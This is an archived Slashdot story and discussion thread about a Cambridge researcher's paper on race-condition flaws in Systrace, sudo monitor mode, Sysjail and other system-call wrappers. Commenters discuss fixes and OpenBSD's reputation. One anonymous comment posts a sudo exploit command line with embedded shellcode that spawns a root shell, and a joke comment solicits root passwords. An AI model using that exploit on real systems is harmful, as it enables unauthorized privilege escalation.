Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Cambridge Researcher Breaks OpenBSD Systrace

kdawson posted about 7 years ago | from the without-a-trace dept.

Security 194

An anonymous reader writes "University of Cambridge researcher Robert Watson has published a paper at the First USENIX Workshop On Offensive Technology in which he describes serious vulnerabilities in OpenBSD's Systrace, Sudo, Sysjail, the TIS GSWTK framework, and CerbNG. The technique is also effective against many commercially available anti-virus systems. His slides include sample exploit code that bypasses access control, virtualization, and intrusion detection in under 20 lines of C code consisting solely of memcpy() and fork(). Sysjail has now withdrawn their software, recommending against any use, and NetBSD has disabled Systrace by default in their upcoming release."

cancel ×

194 comments

Sorry! There are no comments related to the filter you selected.

SELinux and the same ... (5, Informative)

Gopal.V (532678) | about 7 years ago | (#20169547)

James Morris has put up an analysis [livejournal.com] of the same vulnerabilities.

And pushing the system code down into lower echelons of execution (i.e kernel), the way SELinux does it, is a valid fix.

Re:SELinux and the same ... (5, Insightful)

afidel (530433) | about 7 years ago | (#20169739)

I wonder what the performance penalty would be for thunking to kernel space would on every such operation would be? If it was well implemented I would guess it would be minimal since you could just pass the call off to the called kernel object directly. I also wonder what if any security vulnerabilities would be exposed by moving that extra code in kernel space. I know for the TrustedBSD tools it would be minimal due to their strict code checking policies, but for other systems having this much extra code in kernel space might be a risk.

Re:SELinux and the same ... (1)

gwern (1017754) | about 7 years ago | (#20170213)

If the message-passing microkernels are any guide, thunking on every kernel call could be very expensive unless you go to great lengths (like L4) to avoid it.

Re:SELinux and the same ... (2, Informative)

Jokkey (555838) | about 7 years ago | (#20170897)

I wonder what the performance penalty would be for thunking to kernel space would on every such operation would be?

What's being discussed here is system call wrapping, and system calls by definition go to kernel space anyway. No extra thunk to kernel space is required.

Re:SELinux and the same ... (0, Flamebait)

DrSkwid (118965) | about 7 years ago | (#20171503)

> I know for the TrustedBSD tools it would be minimal due to their strict code checking policies

I hope that works out for them because "Secure by default" and "Unbreakable" are amusing rhetoric.

Re:SELinux and the same ... (2, Informative)

makomk (752139) | about 7 years ago | (#20170729)

Just putting the validation code in the kernel is not, by itself, sufficient - it's important that any arguments are copied from userspace exactly once. If the validation code and the actual syscall code each do their own copy from userspace, this is a potentially exploitable security issue.

Linux?` (3, Insightful)

morgan_greywolf (835522) | about 7 years ago | (#20169557)

Any word if any of these vulnerabilities affect Linux or other Unixes as well?

Don't be an idiot. (-1)

Anonymous Coward | about 7 years ago | (#20169577)

Wait for 45 seconds, and your question will be answered.

MOD PARENT DOWN (-1, Troll)

Anonymous Coward | about 7 years ago | (#20170015)

Offtopic

Re:Linux?` (0)

Anonymous Coward | about 7 years ago | (#20170023)

If you use systrace on Linux, yes. I can't think of any mainstream distributions that ship systrace, though, so I believe this vulnerability is a non-issue for the Linux crowd. As for other unices - I have no idea, but I doubt it. OpenBSD's sudo is vulnerable because it has a systrace monitor mode, but sudo on Linux doesn't - so it should be ok.

Re:Linux? (2, Informative)

Noryungi (70322) | about 7 years ago | (#20170123)

Yes, M. Watson also attacked equivalent programs (GSWTK) under Linux successfully.

Read his blog post, as some of the techniques described are quite interesting. Too bad we can't read the full paper.

Re:Linux? (4, Informative)

x_MeRLiN_x (935994) | about 7 years ago | (#20170321)

Would you be talking about this [watson.org] ?

Re:Linux? (0)

Noryungi (70322) | about 7 years ago | (#20171689)

Correct. I only found the link after surfing to his web site.

The beauty of open source (0, Redundant)

xgr3gx (1068984) | about 7 years ago | (#20169569)

Someone will (hopefully) fix the vulnerability, and BSD will end up being better for it.

The beauty of fanboys (0)

Anonymous Coward | about 7 years ago | (#20169955)

Mmmm.... fanboys.

I want to lick them all over.

Re:The beauty of open source (0)

Anonymous Coward | about 7 years ago | (#20171225)

I thought the beauty of open source was that the code was constantly reviewed by a million eyes so that bugs like this would either never occur or would be discovered quickly (rather than years after the fact). I guess that was complete bullshit.

Apposite (0, Offtopic)

frisket (149522) | about 7 years ago | (#20169579)

Offensive Technology

Microsoft Windows?

Re:Apposite (0)

Anonymous Coward | about 7 years ago | (#20169799)

apposite [reference.com]

Since NetBSD seems to be affected as well... (1)

bomanbot (980297) | about 7 years ago | (#20169613)

are other UNIX-based Operating Systems vulnerable as well? Systrace and especially Sudo are very common in nearly all UNIX-like Systems, so maybe Linux and MacOS X users should also be concerned? And what about Windows, since commercially availabe anti-virus systems are also afflicted? That seems like a very serious vulnerability to me...

I'm not worried (2, Funny)

Gazzonyx (982402) | about 7 years ago | (#20169715)

I'm not worried about a vuln. in sudo; I always log in as root and don't have sudo running :). Remember, Real Programmers log in as root. Take that h4x0rz!

Re:I'm not worried (5, Funny)

eno2001 (527078) | about 7 years ago | (#20169997)

You know the old saying... "you get what you stay for". As long as you're logging in as root you will damage your system. It's a known fact. Anyone who logs in as root eventually dostoyevsky's their system. Logging in as root is dangerous. Even using 'su -' is dangerous. 'sudo' provides some level of security and accountability but even that is dangerous. I can't tell you how many times I've seen people type 'sudo bash' and then tool around doing everything as root all the time. The only way to really be safe is to never use any super user abilities whatsoever. The way I've handled it is that any time I run into something that I need root access for, I just give up. So I don't have any new users other than the ones I originally set up when I installed Ubuntu. I also don't have any access to the CD-RW drive built into the system, but that's OK since I'm not an illegal music and software pirate (only pirates use CD-R/CD-RW). I can't use the attached scanner that once worked in Windows 98 but that's OK since there is no need to scan photos or anything in Linux since there are no apps with which to work on them anyway. Whenever the system pops up asking me for the root password I just cancel out and stick with whatever settings the system had. Basically for me, a request for the root password is a threat to the security of my PC, myself and possible the nation or even global security. So in short DO NOT EVER USE root access of ANY kind. It's very dangerous and best left to the experts (bearded and bald scientists in dusty university halls).

Re:I'm not worried (0)

Anonymous Coward | about 7 years ago | (#20170445)

I bet you were modded troll just because of that lame ass saying.

Next time try: "With great power comes great responsibility." -Spider-Man

Re:I'm not worried (1)

DrSkwid (118965) | about 7 years ago | (#20171557)

The successor to Unix [bell-labs.com] got rid of root altogether from the OS.

I prefer a boast like "Nothing to escalate" than "Secure by default"

Re:Since NetBSD seems to be affected as well... (1)

makomk (752139) | about 7 years ago | (#20170631)

Only an experimental feature in a prerelease version of sudo is affected by this vulnerability; normal users of sudo have nothing to worry about.

Re:Since NetBSD seems to be affected as well... (2, Informative)

ratboy666 (104074) | about 7 years ago | (#20171121)

Given that the vulerability exploited is a system call race, it may be that the "unwrapped" system calls may be exploited as well.

Basically, wrapping the call (supposed to increase security) make the race more exploitable. It is NOT "sudo" that is at fault, specifically, because sudo (in its current release) does not do call wrapping.

There is an easy solution available -- simply disallow all execution between the time the system call is invoked, and all parameters have been copied to system space. Alternatively, do not allow threading, and mapping of memory used for parameters in an active call (a bit more difficult).

A security audited system call interface is needed, along with a prohibition on wrapping system calls expected by an application (because those wraps could be exploited by an attacking program).

And you are right -- Windows is probably more vulnerable to this, simply because there are more system calls that use buffer pointers.

But this entire class of exploit is "local only", which means that the system needs to be comprimised another way first; this can be used to obtain root, or use unauthorized resources.

SELinux can be used to prevent much of the damage possible, as can Trusted Solaris. I don't know if there is a Windows eqivalent.

so much for... (0, Flamebait)

Fyre2012 (762907) | about 7 years ago | (#20169677)

...Only two remote holes in the default install, in more than 10 years!

It's unfortunate too tho, considering that OpenBSD is heralded as one of the most secure *nix's around. Looks like it's patch time for many.

Re:so much for... (1)

NeoTerra (986979) | about 7 years ago | (#20169745)

I'm scared when something complex has no patches. Then again I'm more scared when something complex has a LOT of patches.

Re:so much for... (5, Funny)

MrNaz (730548) | about 7 years ago | (#20169805)

Why didn't you just say "I'm scared." ?

Re:so much for... (1)

orclevegam (940336) | about 7 years ago | (#20169963)

Because sometimes I guess the patch level is "just right"?

no (0, Troll)

rubycodez (864176) | about 7 years ago | (#20169797)

these are exploits for a local user on system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get.

Re:no (2, Insightful)

Anonymous Coward | about 7 years ago | (#20170189)

What if you can get a user shell by using an exploit in (firefox|x-chat|bind|apache|ftp|ssh|sendmail|ntp|w hatever open port)?
Guess you get what you deserve when you put a machine on the internet.

Sure it is only an unprivileged local user, what could you do with that.

Oh, wait. You could get root if you had a local user using an other exploit.

Re:no (5, Funny)

Steve Baker (3504) | about 7 years ago | (#20170315)

Exactly, why would anyone want to put a computer on the internet? That's just stupid!

Re:no (1)

Hatta (162192) | about 7 years ago | (#20170357)

Why? Isn't that what multiuser networked operating systems are for?

Re:no (1)

rubycodez (864176) | about 7 years ago | (#20171655)

actually, no, if you're providing services for untrusted users. the user authenticates to and uses a service, but never to machine account to possibly run code on the machine. Local users ALWAYS can mess up a machine, there's no end to the ways they can do it.

Re:no (0)

Anonymous Coward | about 7 years ago | (#20170365)

And a poorly written server side script has never given base level access to the underlying machine to remote users?

Re:no (2)

shadowmas (697397) | about 7 years ago | (#20171137)

these are exploits for a local user on system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get.
Unless of course they did it because they live in the real world and actually practical requirement needing that to be done.

While we're disabling any form of shell access for any reason whatsoever, why not stop all those HTTP servers as well and the SMTP, DNS and all that crap as well. After all anybody who dares expose such a system on the internet when history tells us that there will be new vulnerabilities found in those software is obliviously an idiot.

Re:no (1)

rubycodez (864176) | about 7 years ago | (#20171737)

If someone has need for a local account on a machine or any ability to run arbitrary code you're in the same realm as company hiring employee and trying to verify if they are trustworthy or not. Local user can always cause problems if they so choose. Just like anyone with physical access can cause even more problems.

Re:so much for... (4, Informative)

ArwynH (883499) | about 7 years ago | (#20169827)

And it still only has had two remote holes in the default install in more than 10 years. This isn't a remotely exploitable hole, it allows privilege escalation, which requires access to the system and thus is a local hole. It's still a whopper of a hole though...

Re:so much for... (0)

Anonymous Coward | about 7 years ago | (#20170177)

This idea that only holes in the default install count is kind of silly. If there's a remote hole in the FTP server then it certainly is an issue for people who want to run the FTP server.

Re:so much for... (3, Insightful)

teknopurge (199509) | about 7 years ago | (#20170415)

Then choose a better FTP server - it's not OpenBSD's fault you installed pr00tme-ftpd.

I can also publish a root password for my servers on digg. Does that mean it's OpenBSD's fault for that 'exploit' as well?

The purpose of the default install is a configuration that has been audtied by _the_ most anal development team on the planet. This is nothing but a good thing, and if people have a problem with Theo's attitude, feel free to fork the codebase.

On my list of the 10 best OSS projects, OpenBSD is in the top 5.

Re:so much for... (5, Funny)

EvanED (569694) | about 7 years ago | (#20171341)

On my list of the 10 best OSS projects, OpenBSD is in the top 5.

In other words... it's in your list of the 5 best OSS projects.

(sorry)

Re:so much for... (2)

DrSkwid (118965) | about 7 years ago | (#20171605)

OpenBSD auditing isn't the god of all auditing you think it is.

This is just another piece of audited code that roots you.

Re:so much for... (1)

Hatta (162192) | about 7 years ago | (#20171687)

It's a marketing slogan, of course it's silly. "Only two remote holes in the default install, in more than 10 years!" means about as much as "99 44/100 percent pure."

What should individual users do (0)

Anonymous Coward | about 7 years ago | (#20169705)

The article says that vendors have been given 6 months - several years notice.
Does anyone know what OpenBSD has done, or what individuals who use OpenBSD should
do in light of this article? Specific instructions please!

Re:What should individual users do (1)

bberens (965711) | about 7 years ago | (#20171813)

The workaround is very complex. Send your IP and root password to pwnd@dodgeit.com and I'll take a look at your system to help make recommendations.

No need for alarm! (5, Funny)

Antarius (542615) | about 7 years ago | (#20169731)

The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

Re:No need for alarm! (5, Funny)

nateb (59324) | about 7 years ago | (#20169791)

The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

All twelve of them. :)

I like the thought of openbsd, though, having never used it. I'm sure everything will be fine.

Re:No need for alarm! (1)

Dan Ost (415913) | about 7 years ago | (#20170081)

OpenBSD is my favorite platform for purpose-built machines. I do appreciate the security, but the main reason I like it is for the quality documentation (especially the man pages!) and the ease of setup.

The majority of my machines run Gentoo, but Gentoo can't really by used as a fire-and-forget platform like OBSD can be.

Re:No need for alarm! (5, Funny)

peacefinder (469349) | about 7 years ago | (#20170401)

All twelve of them. :)

We yell really loud.

(And I actually yelled "Wow!". We're not a homogenous lot.)

Re:No need for alarm! (1)

MysteriousPreacher (702266) | about 7 years ago | (#20170853)

That's 13 now, I just picked up the disks a little while ago.

OpenBSD will never have the popularity or wide range of ports that FreeBSD has but it's a pretty solid system designed with a clear mandate. It's worth installing, even just to see the security decisions that have been taken so you can apply them to another Unix-like system. Like Dan Ost said, the documentation is excellent and the developers and mailing list users have been pretty helpful. The only thing I'm missing is WPA support.

Re:No need for alarm! (0)

Anonymous Coward | about 7 years ago | (#20170005)

Both of them?

Re:No need for alarm! (1)

Antarius (542615) | about 7 years ago | (#20170363)

They have big voices?

"Pay no attention to the Pufferfish behind the curtain"

And the most popular response to the halving of the OpenBSD userbase for humorous reasons:

"It's a sign that OpenBSD is a Mature O.S. So mature that the userbase has gone through puberty!"


[Whaddya mean "youdongeddit?" Puberty. You know; when a boys balls drop. The voice gets lower... Aw, forget it.]

Re:No need for alarm! (0, Redundant)

guruevi (827432) | about 7 years ago | (#20170361)

I didn't know they could BOTH shout thatloud.

why give much of a crap (2, Informative)

rubycodez (864176) | about 7 years ago | (#20169859)

on local user/software exploits? my domains have over a thousand users, but no one logs into an account on the machine.

Re:why give much of a crap (1)

xaxa (988988) | about 7 years ago | (#20170105)

I have SSH access to some machines I have webspace on (with Fasthosts, I think). I think they use GNU/Linux, but presumably there are people offering the same service but with BSD.

Re:why give much of a crap (4, Insightful)

Alioth (221270) | about 7 years ago | (#20170107)

Local exploits are only a phpBB vulnerability from being a remote exploit. If you're running a hosting service, and you're not treating local vulnerabilities as seriously as remote ones, it's only a matter of time before your machine is pwned and becomes a spam zombie. I've seen it happen.

If you allow scripting on your server, then you've essentially given your users shell access, anyway.

Re:why give much of a crap (1)

teknopurge (199509) | about 7 years ago | (#20171191)

very untrue.

php, for example, has a disable_functions parameter that prevents scripts from doing thing they should not be doing.

I feel for the hosting companies that you have been with that do not audit their boxes.

Regards,

Re:why give much of a crap (1)

DrSkwid (118965) | about 7 years ago | (#20171641)

If you sleep at night on the strength of PHP's codebase then you should make sure your phone is turned off to save you being woken by the "we've been rooted" call.

Re:why give much of a crap (1)

rubycodez (864176) | about 7 years ago | (#20171599)

bullshit, crap code by incompetent programmers causes input data to be executed, the scripting languages all have ways to flag data as tainted suspect and deal with it properly with no possibility of execution (e.g. sql injection attacks, etc.) Piss poor development practices will always lead to security breaches, and that goes for any language not just the scripting ones. The biggest and most damaging attacks have been due to sloppiness in the c/c++ realm (ooo, who would ever give us more data than we expected, etc.)

Re:why give much of a crap (1)

edunbar93 (141167) | about 7 years ago | (#20170299)

Oh, that's easy. Because when an attacker breaks into someone's CMS (because your users most certainly do not read about security updates on software mailing lists, and there's no way in hell you even know what they're running), suddenly that attacker *does* have a login on that machine. They can now run software as the "httpd" user. This is the reason jail(8) was invented. And what do you know... they found a vulnerability in a certain version of jail.

OpenBSD Security (4, Funny)

pathological liar (659969) | about 7 years ago | (#20169865)

... now if only this would lead to a little ego deflation and humility among OpenBSD developers.

As long as I'm dreaming, I also want a pony.

Re:OpenBSD Security (1)

teknopurge (199509) | about 7 years ago | (#20170319)

Parish that thought.

Because of their egos, a fix is likely being commited to CVS as we speak.

Re:OpenBSD Security (3, Funny)

frenchbedroom (936100) | about 7 years ago | (#20171587)

Parish that thought.

You mean like, put it in a convent [wikipedia.org] or something ? Oh no, I get it, you mean he should build a little chapel in memory of it, right ?

No released version of sudo affected (5, Informative)

millert (10803) | about 7 years ago | (#20169887)

The sudo systrace support is part of an experimental feature ("monitor mode") not present in any of the real sudo releases (though the code is available via anonymous cvs). Given the deficiencies of systrace (and ptrace) it is unlikely that this feature will be present in any future sudo release.

  - todd

Re:No released version of sudo affected (1)

fimbulvetr (598306) | about 7 years ago | (#20169961)

Hello Todd.

Thanks for sudo, and thanks for this clarification.

Re:No released version of sudo affected (0)

Anonymous Coward | about 7 years ago | (#20169969)

Someone upmod this guy, he's the developer of sudo.

Re:No released version of sudo affected (0)

Anonymous Coward | about 7 years ago | (#20170473)

hi todd, remember me? ./sudo
`perl -e 'print "-p h%h%h%h%h" .
"A"x11188 .
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\ x07\x89\x56\x0f\xb8\x1b"
"\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\ xd1\xcd\x80\x33\xc0\x40"
"\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" .
"AAAAAAAAA" .
"\xff\xff\xff\xff\x18\xeb\xff\xff\xff\xb4\xb6\x05\ x08\xa1\xdc\x06\x08%"'`
`perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`
`perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`
`perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`

good times that.

Code isn't up (thank goodness) (1)

xC0000005 (715810) | about 7 years ago | (#20169927)

It appears he's removed the code from the presentation (though it still says it's present, I don't see it). Good.

Re:Code isn't up (thank goodness) (0)

Anonymous Coward | about 7 years ago | (#20170465)

you're not too brillant, are you ?

Thanks God.

Ha Ha (4, Funny)

UnknowingFool (672806) | about 7 years ago | (#20169931)

Sweet justice! My Win98 boxes have finally protected me against a hole. I am invinci*^&#%
$#%#^&&!#$@$

[CONNNECTION LOST]

MOD PARENT DOWN!! (0, Offtopic)

Anonymous Coward | about 7 years ago | (#20170217)

This is frickin' stupid. Nice try at ripping off the CARRIER LOST template, but you should at least copy and paste it if you don't understand where it came from.

Brace for impact... (5, Funny)

Mattintosh (758112) | about 7 years ago | (#20169941)

Theo DeRaadt goes on a rampage in 5... 4... 3... 2...

Re:Brace for impact... (1, Interesting)

Anonymous Coward | about 7 years ago | (#20170093)

De Raadt doesn't do Rampages, he only does games available via console, like Tetris, Hunt and Hangman.

He also doesn't get upset about problems being found in software, like any sane person, he's more afraid of the problems he's not finding out about.

Re:Brace for impact... (0)

Anonymous Coward | about 7 years ago | (#20171413)

He also doesn't get upset about problems being found in software
Michael Buesch would beg to differ.

like any sane person, he's more afraid of the problems he's not finding out about.
Two problems with this: you're making the assumption that Theo is sane, and that being upset about one thing precludes the possibility of being upset about something else.

Re:Brace for impact... (1, Informative)

Anonymous Coward | about 7 years ago | (#20171847)

Michael Buesch is a sodding douche who jumped the gun and instead of actually talking to people started screaming bloody murder, and Theo was not upset about the problem in the code so much as Michael Buesch being said douche. Read the threads, it's almost entirely based on Theo saying, "you didn't have to be a fucking asshole about it."

Re:Brace for impact... (1)

arehnius (1071476) | about 7 years ago | (#20170241)

Correct me if I'm wrong, but Robert Watson is a kind of security guru for FreeBSD, isn't he ? From his page :

Robert Watson (FreeBSD Home Page) : I'm a FreeBSD Core Team member, as well as member of the security officer and release engineering teams.
I hope nobody will take it as a plot of FreeBSD to gain/keep lead over other BSDs.

Re:Brace for impact... (1)

mulvane (692631) | about 7 years ago | (#20171411)

The BSD's work pretty closely together and if he did find something in another BSD, it could be very possible he was looking into a feature to port over and doing his own testing of the code before hand found this. Is this what happened? I am not sure, but it is possible. The BSD's are really in a non-compete status with each other and are more in a sharing of knowledge of the forks of the original base.

fix shedules ? (0)

Anonymous Coward | about 7 years ago | (#20169965)

anyone know how or when these things are supposed to be fixed ?

as usual I would assume *bsd to put out fixes quite timely...

Re:fix shedules ? (3, Informative)

orclevegam (940336) | about 7 years ago | (#20170053)

as usual I would assume *bsd to put out fixes quite timely...

Well, the fix for now appears to be don't use the vulnerable software, but considering that the vulnerability allows you to break the software such that it behaves as if it wasn't running, I have to wonder if people should use it anyway and just accept that for now anyone that knows how can bypass that particular security check. Also, if it was something simple like a buffer overrun that would be trivial to patch, but because of the way this particular vulnerability functions (concurrency attack) there's not simple solution. Some have suggested pushing the code to kernel space, but as they've also pointed out, that's rather risky in its own regard. Short of some kind of provision in the kernel to prevent the attacks I'm not sure how this could be fixed (although I haven't seen to many details, just that it involves re-writing some args after they've already been scanned by systrace).

Re:fix shedules ? (3, Informative)

TubeSteak (669689) | about 7 years ago | (#20170645)

as usual I would assume *bsd to put out fixes quite timely...
FTFA: All affected vendors received at least six months, and in some cases many years advance notice regarding these vulnerabilities.

"cambrige researcher"... (3, Informative)

diegocgteleline.es (653730) | about 7 years ago | (#20170025)

...and he's also one of the most important FreeBSD hackers.

Re:"cambrige researcher"... (1, Flamebait)

chrisgagne (605844) | about 7 years ago | (#20171337)

He's probably one of the *only* FreeBSD hackers.

Why??? (0)

PookieToo (941358) | about 7 years ago | (#20170101)

Why is everyone so hell bent on BREAKING things? Can't we all just try to get along for an instant?

Re:Why??? (4, Interesting)

orclevegam (940336) | about 7 years ago | (#20170169)

Why is everyone so hell bent on BREAKING things? Can't we all just try to get along for an instant?

Because the fastest way to learn about something is to break it. Why do you think physicists spend all that time and money on particle accelerators?

Re:Why??? (1)

ettlz (639203) | about 7 years ago | (#20170469)

Clarification:

Why do you think physicists spend all that time and
other people's

money on particle accelerators?
;) (Well, I'm a theorist, so make of it what you will...)

So they can break someone *else's*! (0)

Anonymous Coward | about 7 years ago | (#20171007)

Article? (1)

Leafheart (1120885) | about 7 years ago | (#20170157)

Site is slashdotted, anyone got a copy of the article?

Re:Article? (1, Interesting)

Anonymous Coward | about 7 years ago | (#20170295)

By the way, what has happened to the slashdot effect? Not so long ago the first thing I did when reading about something on slashdot was finding a coral or google cache link to the actual article on the comments section. Nowadays - and I haven't really even thought about it - the articles usually just work. Are the webservers better now, or has the power of slashdot effect declined?

Or have I just been lucky?

Re:Article? (1, Funny)

Anonymous Coward | about 7 years ago | (#20170339)

Are the webservers better now, or has the power of slashdot effect declined? Or have I just been lucky?

Yes.

Re:Article? (3, Funny)

jjrockman (802957) | about 7 years ago | (#20170739)

Nah, it's just that nobody RTFA anymore.

Re:Article? (1)

RockoTDF (1042780) | about 7 years ago | (#20171349)

No, the power of the digg effect has gone up.

problem affects a variety of software (1, Informative)

Anonymous Coward | about 7 years ago | (#20170405)

This class of problem potentially affects a variety of software. Systrace (which runs on Linux, NetBSD, OpenBSD, Darwin, etc) was given as one example of software that is affected. Even Sun's Dtrace might be vulnerable.

Well (-1, Flamebait)

Anonymous Coward | about 7 years ago | (#20170451)

It is official; Netcraft now confirms: *BSD is dying

One more crippling bombshell hit the already beleaguered *BSD community when IDC confirmed that *BSD market share has dropped yet again, now down to less than a fraction of 1 percent of all servers. Coming close on the heels of a recent Netcraft survey which plainly states that *BSD has lost more market share, this news serves to reinforce what we've known all along. *BSD is collapsing in complete disarray, as fittingly exemplified by failing dead last in the recent Sys Admin comprehensive networking test.

You don't need to be a Kreskin to predict *BSD's future. The hand writing is on the wall: *BSD faces a bleak future. In fact there won't be any future at all for *BSD because *BSD is dying. Things are looking very bad for *BSD. As many of us are already aware, *BSD continues to lose market share. Red ink flows like a river of blood.

FreeBSD is the most endangered of them all, having lost 93% of its core developers. The sudden and unpleasant departures of long time FreeBSD developers Jordan Hubbard and Mike Smith only serve to underscore the point more clearly. There can no longer be any doubt: FreeBSD is dying.

Let's keep to the facts and look at the numbers.

OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many users of NetBSD are there? Let's see. The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 NetBSD users. BSD/OS posts on Usenet are about half of the volume of NetBSD posts. Therefore there are about 700 users of BSD/OS. A recent article put FreeBSD at about 80 percent of the *BSD market. Therefore there are (7000+1400+700)*4 = 36400 FreeBSD users. This is consistent with the number of FreeBSD Usenet posts.

Due to the troubles of Walnut Creek, abysmal sales and so on, FreeBSD went out of business and was taken over by BSDI who sell another troubled OS. Now BSDI is also dead, its corpse turned over to yet another charnel house.

All major surveys show that *BSD has steadily declined in market share. *BSD is very sick and its long term survival prospects are very dim. If *BSD is to survive at all it will be among OS dilettante dabblers. *BSD continues to decay. Nothing short of a cockeyed miracle could save *BSD from its fate at this point in time. For all practical purposes, *BSD is dead.

Fact: *BSD is dying

Re:Well (0)

Anonymous Coward | about 7 years ago | (#20170533)

In other news, no but middle managers cares what Netcraft has to say about OS usage.

This is exactly why I love OpenBSD! (4, Insightful)

amper (33785) | about 7 years ago | (#20170611)

The very fact that the OpenBSD project makes itself such a huge target for would-be hackers is what makes it almost certain that any vulnerabilities will be found and patched. No handwringing is necessary here, though quite a lot of recoding may be involved. We can all look forward to an even more secure OpenBSD very soon. Keep up the good work, everyone!

Re:This is exactly why I love OpenBSD! (1)

DrSkwid (118965) | about 7 years ago | (#20171679)

Nah, OS X exploits are where the kudos is at. You don't get death threats from Theo

OF - Hey, I know what supposed to be behind this.. (0)

Anonymous Coward | about 7 years ago | (#20170895)

I know what supposed to be behind this roof!

It's a view of my City!

I'm not kidding, picture taken from http://en.wikipedia.org/wiki/Chillon [wikipedia.org] looking at my City http://en.wikipedia.org/wiki/Montreux [wikipedia.org]

It's freakin' Swiss Day on slashdot or what ? next article is going to be about a red cross on a white flag... oh wait

USENIX Workshop On Offensive Technology (1)

Moniker42 (1131485) | about 7 years ago | (#20170963)

USENIX Workshop On Offensive Technology spells umm... woot?

*checks the date*

well, it's not April 1st ;)

Am I missing something? (0, Redundant)

Ancient_Hacker (751168) | about 7 years ago | (#20171663)

Am I missing something?

Isn't it well known that you should not validate some data that the user might still be able to modify? That's security 101.

What's the problem with copying parameters to some memory space that the user can't reach, like the system heap? Surely moving a few bytes isn't going to be a big performance hit, compared to the time it takes to validate parameters.

OpenBSD's man page for systrace mentions this? (5, Informative)

cgdae (996476) | about 7 years ago | (#20171903)

OpenBSD's systrace manpage appears to mention this problem in the BUGS section:

Applications that use clone()-like system calls to share the complete address space between processes may be able to replace system call arguments after they have been evaluated by systrace and escape policy enforcement.

Or see http://www.openbsd.org/cgi-bin/man.cgi?query=systr ace&apropos=0&sektion=0&manpath=OpenBSD+Current&ar ch=i386&format=html [openbsd.org]

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>